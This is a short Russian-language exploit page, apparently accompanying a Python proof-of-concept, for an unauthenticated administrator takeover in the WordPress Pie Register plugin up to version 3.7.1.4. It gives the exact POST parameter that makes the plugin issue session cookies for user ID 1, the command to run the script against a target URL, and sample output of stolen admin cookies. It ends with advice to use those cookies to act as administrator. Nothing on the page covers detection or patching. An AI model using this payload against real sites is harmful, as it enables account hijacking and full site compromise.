
WordPress Pie Register ≤ 3.7.1.4 - Эскалация привилегий администратора (без аутентификации)
Mrj Haxcore
Плагин Pie Register для WordPress (версии ≤ 3.7.1.4) предоставляет неаутентифицированную конечную точку, которая позволяет атакующему перехватить сессии администратора, просто отправив POST-запрос с определёнными данными.
Эксплуатация приводит к краже сессионных куки пользователя с ID 1 (обычно admin) без необходимости ввода учётных данных.
pie-registeruser_id_social_site=1
При отправке POST-запроса на корневой URL (/) этот параметр заставляет плагин аутентифицировать атакующего как пользователя с ID 1 (обычно admin) и выдавать действительные сессионные куки.
requests, beautifulsoup4 (опционально, для разбора куки)python3 pie.py http://target.site
Вывод [*] Отправка полезной нагрузки для перехвата сессии администратора...
[+] Успешно перехвачены куки для user_id=1 (admin): wordpress_sec_xxxxxx = <cookie_value> wordpress_logged_in_xxxxxx = <cookie_value>
[!] Используйте эти куки в вашем браузере или таких инструментах, как curl или Burp, чтобы действовать как администратор.